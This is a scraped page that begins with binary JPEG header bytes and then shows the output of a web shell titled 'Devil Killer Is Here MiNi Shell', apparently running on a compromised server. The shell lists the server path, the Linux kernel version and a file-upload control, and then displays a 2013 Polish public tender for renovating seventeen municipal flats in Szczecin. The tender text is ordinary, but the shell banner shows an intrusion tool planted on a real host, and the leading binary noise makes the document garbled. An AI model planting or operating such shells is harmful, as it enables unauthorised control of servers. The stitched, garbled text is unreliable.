JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130805/313918-N-2013.html

<p class="kh_header"><b>Szczecin: Wykonanie remontu siedemnastu komunalnych lokali mieszkalnych 
w Szczecinie, w podziale na trzy części:

1)	Część I zamówienia - ul. Nad Odrą 26, ul. Nad Odrą 113, ul. Nad Odrą 113/4, ul. Nad Odrą 113/8, ul. Strzałowska 37a/1, ul. Światowida 96/7, ul. Ziemowita 3;
2)	Część II zamówienia - ul. Dubois 15/4, ul. Sławomira 12/24, ul. Sławomira 15/12, ul. Sławomira 16/14, ul. Szarotki1/18;
3)	Część III zamówienia - ul. Szarotki 12/15, ul. Asnyka 17/4, ul. Kapitańska 8a/13, ul. Kołłątaja 24/16, ul. Wyzwolenia 80/3</b><br>
<b>Numer ogłoszenia: 313918 - 2013; data zamieszczenia: 05.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd  Budynków i Lokali  Komunalnych , ul. Mariacka 25, 70-546 Szczecin, woj. zachodniopomorskie, tel. 91 4886333, 91 4886301, faks 91 4893831, 91 4893832.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http:/WWW.ZBiLK.szczecin.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie remontu siedemnastu komunalnych lokali mieszkalnych 
w Szczecinie, w podziale na trzy części:

1)	Część I zamówienia - ul. Nad Odrą 26, ul. Nad Odrą 113, ul. Nad Odrą 113/4, ul. Nad Odrą 113/8, ul. Strzałowska 37a/1, ul. Światowida 96/7, ul. Ziemowita 3;
2)	Część II zamówienia - ul. Dubois 15/4, ul. Sławomira 12/24, ul. Sławomira 15/12, ul. Sławomira 16/14, ul. Szarotki1/18;
3)	Część III zamówienia - ul. Szarotki 12/15, ul. Asnyka 17/4, ul. Kapitańska 8a/13, ul. Kołłątaja 24/16, ul. Wyzwolenia 80/3.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie remontu siedemnastu komunalnych lokali mieszkalnych, w podziale na trzy części:

1)	Część I zamówienia - ul. Nad Odrą 26, ul. Nad Odrą 113, ul. Nad Odrą 113/4, ul. Nad Odrą 113/8, ul. Strzałowska 37a/1, ul. Światowida 96/7, ul. Ziemowita 3;
2)	Część II zamówienia - ul. Dubois 15/4, ul. Sławomira 12/24, ul. Sławomira 15/12, ul. Sławomira 16/14, ul. Szarotki1/18.
3)	Część III zamówienia - ul. Szarotki 12/15, ul. Asnyka 17/4, ul. Kapitańska 8a/13, ul. Kołłątaja 24/16, ul. Wyzwolenia 80/3

2.	Przedmiot zamówienia należy wykonać zgodnie ze Specyfikacją Techniczną Wykonania i Odbioru Robót Budowlanych, warunkami technicznymi oraz sztuką budowlaną. Roboty należy prowadzić zgodnie z obowiązującymi przepisami bezpieczeństwa i higieny pracy przy wykonywaniu robót budowlanych i przepisami p.poż.
3.	Wykonawca jest wytwarzającym odpady w rozumieniu przepisów ustawy o odpadach z dnia 27 kwietnia 2001 roku z późniejszymi zmianami. Wykonawca w trakcie realizacji przedmiotu zamówienia ma obowiązek w pierwszej kolejności poddania odpadów budowlanych (odpadów betonowych, ziemi gruzu budowlanego) odzyskowi, a jeżeli z przyczyn technologicznych jest on niemożliwy lub nieuzasadniony z przyczyn ekologicznych lub ekonomicznych, to Wykonawca zobowiązany jest do przekazania powstałych odpadów do unieszkodliwienia. Wykonawca zobowiązany jest udokumentować Zamawiającemu sposób gospodarowania tymi odpadami (utylizacja, wywóz gruzu itp.) jako warunek dokonania odbioru końcowego realizowanego zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-1, 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 80.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wadium należy wnieść w wysokości: 
1)	dla Części I zamówienia (ul. Nad Odrą 26, ul. Nad Odrą 113, ul. Nad Odrą 113/4, ul. Nad Odrą 113/8, ul. Strzałowska 37a/1, ul. Światowida 96/7, ul. Ziemowita 3) - 651,00 zł (słownie: sześćset pięćdziesiąt jeden złotych),
2)	dla Części II zamówienia (ul. Dubois 15/4, ul. Sławomira 12/24, ul. Sławomira 15/12, ul. Sławomira 16/14, ul. Szarotki1/18) - 890,00 zł (słownie: osiemset dziewięćdziesiąt złotych),
3)	dla Części III zamówienia (ul. Szarotki 12/15, ul. Asnyka 17/4, ul. Kapitańska 8a/13, ul. Kołłątaja 24/16, ul. Wyzwolenia 80/3) - 581,00 zł (słownie: pięćset osiemdziesiąt jeden złotych)
     w terminie do dnia 21.08.2013 r. do godz. 10:00. Decyduje data wpływu środków do   zamawiającego.
2.	Wadium może być wnoszone:
1)	w pieniądzu - przelewem na konto ZBiLK w ING Bank Śląski O/Szczecin nr 73 1050 0099 6803 0000 0000 0001
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
Dokumenty, o których mowa w pkt 2 należy zdeponować w siedzibie ZBiLK przy 
ul. Mariackiej 25, w pokoju nr  9  przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał  należycie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum jedną najważniejszą robotę budowlaną. Za jedną najważniejszą robotę budowlaną zamawiający uzna, wykonanie remontu jednego lokalu mieszkalnego we wszystkich branżach</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował minimum jedną osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	oferta cenowa zgodnie z Rozdziałem I ust. 3 siwz; 
W przypadku składania oferty wspólnej należy złożyć jeden dokument
2)	odpowiednie pełnomocnictwa;
tylko w sytuacjach określonych w Rozdziale I ust. 5 zdanie 2  siwz lub w przypadku składania oferty wspólnej (Rozdział III ust. 1 siwz)
3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące cześć zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców);
W przypadku składania oferty wspólnej należy złożyć jeden dokument
4)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz, potwierdzające, 
że wykonawca na 2 dni  przed podpisaniem umowy przedłoży kosztorysy szczegółowe dla każdego lokalu mieszkalnego, sporządzone zgodnie z zasadami określonymi w Rozdziale X siwz.
 W przypadku składania oferty wspólnej należy złożyć jeden dokument 
5)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz, potwierdzające, że wykonawca przed podpisaniem umowy przedłoży opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie niższą niż wysokość wynagrodzenia na czas trwania robót budowlanych.
W przypadku składania oferty wspólnej należy złożyć jeden dokument</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z art.144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający dopuszcza zmiany zawartej umowy w zakresie:
1)	terminu wykonania zamówienia w przypadku wystąpienia nieprzewidzianych robót, których realizacja jest niezbędna do prawidłowego wykonania przedmiotu umowy                   i będzie miała istotny wpływ na przedłużenie terminu zakończenia robót,
2)	osób przewidzianych do realizacji umowy, w szczególnych przypadkach losowych, których wystąpienie uniemożliwi realizację umowy przez te osoby.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zbilk.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Budynków i Lokali Komunalnych
ul. Mariacka 25
70-546 Szczecin
pokój nr 9 (po okazaniu dowodu wpłaty kwoty 20 zł dla jednej części na konto 93105015591000002243552706.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2013 godzina 10:00, miejsce: Zarząd Budynków i Lokali Komunalnych
ul. Mariacka 25
70-546 Szczecin
pokój nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Termin wykonania zamówienia - 80 dni kalendarzowych liczonych od dnia protokolarnego przekazania placu budowy, bez względu na ilość części na jaką wykonawca złoży ofertę.
W przypadku złożenia oferty na dwie lub trzy części zamówienia, powyższy termin nie ulega sumowaniu.
2.	Wymagany przez zamawiającego okres gwarancji jakości - 12 miesięcy, licząc od daty odbioru robót w danym lokalu mieszkalnym.
3.	Wymagany przez Zamawiającego okres rękojmi - 12 miesięcy, licząc od daty odbioru końcowego przedmiotu umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ul. Nad Odrą 26, ul. Nad Odrą 113, ul. Nad Odrą 113/4, ul. Nad Odrą 113/8, ul. Strzałowska 37a/1, ul. Światowida 96/7, ul. Ziemowita 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie remontu komunalnych lokali mieszkalnych - ul. Nad Odrą 26, ul. Nad Odrą 113, ul. Nad Odrą 113/4, ul. Nad Odrą 113/8, ul. Strzałowska 37a/1, ul. Światowida 96/7, ul. Ziemowita 3
2.	Zakres remontu poszczególnych lokali mieszkalnych:
1)	 w budynku przy ul. Nad Odrą 26 (powierzchnia użytkowa lokalu - 44,45 m2): 
a)	w branży budowlanej -  zamurowanie przebić w ścianach, naprawa drzwi i okien, malowanie ścian wraz z robotami towarzyszącymi, 
b)	w branży sanitarnej - wymiana zlewu i elementów spłuczki, 
c)	w branży elektrycznej - naprawa instalacji i osprzętu, pomiar rezystancji izolacji instalacji elektrycznej,

2)	 w budynku przy ul. Nad Odrą 113 (powierzchnia użytkowa lokalu - 20,00 m2): 
a)	w branży budowlanej - malowanie emulsyjne tynków wewnętrznych wraz z robotami towarzyszącymi, dopasowanie skrzydeł drzwiowych, remont ustępu poza lokalem,
b)	w branży sanitarnej - demontaż urządzeń sanitarnych,
c)	w branży elektrycznej - naprawa instalacji i osprzętu, wymiana tablicy licznikowej, pomiar rezystancji izolacji instalacji elektrycznej, 

3)	 w budynku przy ul. Nad Odrą 113/4 (powierzchnia użytkowa lokalu - 56,46 m2):
a)	w branży budowlanej - malowanie wraz z robotami towarzyszącymi, montaż nawiewnika okiennego,
b)	w branży sanitarnej - montaż wodomierza, próba instalacji gazowej,
c)	w branży elektrycznej - wymiana tablicy bezpiecznikowej, pomiar rezystancji izolacji instalacji elektrycznej, 

4)	w budynku przy ul. Nad Odrą 113/8 (powierzchnia użytkowa lokalu 56,08 m2): 
a)	w branży budowlanej - odgrzybianie stropów, malowanie farbą emulsyjną tynków wewnętrznych wraz z robotami towarzyszącymi, dopasowanie skrzydeł drzwiowych, przestawienie pieców kaflowych,
b)	w branży sanitarnej - próba instalacji gazowej, montaż wodomierza
c)	w branży elektrycznej - nie występuje


5)	 w budynku przy ul. Strzałowska 37a/1 (powierzchnia użytkowa lokalu - 30,42 m2):
a)	w branży budowlanej - naprawa tynków wewnętrznych, odgrzybianie ścian i stropów, naprawa posadzki, dopasowanie skrzydeł okiennych, malowanie farbą emulsyjną tynków wewnętrznych wraz z robotami towarzyszącymi, wywóz gruzu, przestawienie pieca kaflowego, szklenie,
b)	w branży sanitarnej - montaż wodomierza, zlewozmywaka 
c)	w branży elektrycznej - wymiana instalacji i osprzętu elektrycznego, pomiar rezystancji izolacji instalacji elektrycznej.

6)	w budynku przy ul. Światowida 96/7 (powierzchnia użytkowa lokalu - 50,38 m2):
a)	w branży budowlanej - malowanie farbą emulsyjną tynków wewnętrznych wraz z robotami towarzyszącymi, przestawienie pieca kaflowego, montaż drzwi harmonijkowych, wymiana skrzydeł drzwiowych, wywóz gruzu,
b)	w branży sanitarnej - montaż wodomierza, montaż urządzeń sanitarnych,
c)	w branży elektrycznej - wymiana instalacji wraz z osprzętem elektrycznym, pomiar rezystancji izolacji instalacji elektrycznej.

7)	 w budynku przy ul. Ziemowita 3 (powierzchnia użytkowa lokalu - 20,00 m2):
a)	w branży budowlanej - dopasowanie skrzydeł drzwiowych, wymiana stopni betonowych, remont WC poza lokalem, malowanie farbą emulsyjną tynków wewnętrznych, wywóz gruzu,
b)	w branży sanitarnej - montaż zlewozmywaka  
c)	w branży elektrycznej - wymiana wyłączników, pomiar rezystancji izolacji instalacji elektrycznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-1, 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 80.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ul. Dubois 15/4, ul. Sławomira 12/24, ul. Sławomira 15/12, ul. Sławomira 16/14, ul. Szarotki1/18.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie remontu komunalnych lokali mieszkalnych - ul. Dubois 15/4, ul. Sławomira 12/24, ul. Sławomira 15/12, ul. Sławomira 16/14, ul. Szarotki1/18.
2.	Zakres remontu poszczególnych lokali mieszkalnych:

1)	w budynku przy ul. Dubois 15/4 (powierzchnia użytkowa lokalu - 74,79 m2):
a)	w branży budowlanej - uzupełnienie tynków wewnętrznych, malowanie farbą emulsyjną, szklenie, przestawienie pieca kaflowego, montaż czujnika czadu, wywiezienie gruzu,
b)	w branży sanitarnej - wymiana wodomierza, zaworu czerpalnego, zlewu, kuchenki gazowej, próba instalacji gazowej,
c)	w branży elektrycznej - wymiana instalacji i osprzętu elektrycznego, pomiar rezystancji izolacji instalacji elektrycznej.

2)	w budynku przy ul. Sławomira 12/24 (powierzchnia użytkowa lokalu - 36,81 m2):
a)	w branży budowlanej - naprawa tynków, montaż czujnika czadu, dopasowanie skrzydeł drzwiowych, naprawa posadzki, malowanie farbą emulsyjną tynków wewnętrznych wraz z robotami towarzyszącymi, dopasowanie skrzydeł okiennych, wywóz gruzu,
b)	w branży sanitarnej - wymiana wodomierza, zlewu i podejścia z PCV, próba instalacji gazowej,
c)	w branży elektrycznej - wymiana instalacji elektrycznej i osprzętu, pomiary rezystancji izolacji instalacji elektrycznej,

3)	w budynku przy ul. Sławomira 15/12 (powierzchnia użytkowa lokalu - 50,20 m2):
a)	w branży budowlanej - malowanie farbą emulsyjną tynków wewnętrznych wraz z robotami towarzyszącymi, dopasowanie skrzydeł okiennych, naprawa posadzki, naprawa pieca kaflowego, wywóz gruzu,
b)	w branży sanitarnej - wymiana zlewozmywaka, wodomierza, próba instalacji gazowej,
c)	w branży elektrycznej - wymiana instalacji elektrycznej i osprzętu, pomiar rezystancji izolacji instalacji elektrycznej,

4)	w budynku przy ul. Sławomira 16/14 (powierzchnia użytkowa lokalu - 39,25 m2) ;
a)	w branży budowlanej - odgrzybienie ścian, przestawienie pieca kaflowego, dopasowanie skrzydeł drzwiowych, regulacja i konserwacja okien PCV, mycie po robotach malarskich, wywóz gruzu,
b)	W branży sanitarnej - próba instalacji gazowej, wymiana wodomierza, kurka gazowego,
c)	W branży elektrycznej - wymiana instalacji i osprzętu elektrycznego, pomiar  rezystancji izolacji instalacji elektrycznej,

5)	w budynku przy ul. Szarotki 1/18 (powierzchnia użytkowa lokalu - 37,52 m2):
a)	w branży budowlanej - malowanie farbą emulsyjną tynków wewnętrznych, dopasowanie skrzydeł drzwiowych i okiennych, przestawienie pieca kaflowego, wywiezienie gruzu,
b)	w branży sanitarnej - wymiana wodomierza, zlewu,
c)	w branży elektrycznej - wymiana instalacji i osprzętu elektrycznego, pomiar rezystancji izolacji instalacji elektrycznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-1, 45.45.30.00-7.</p></li>
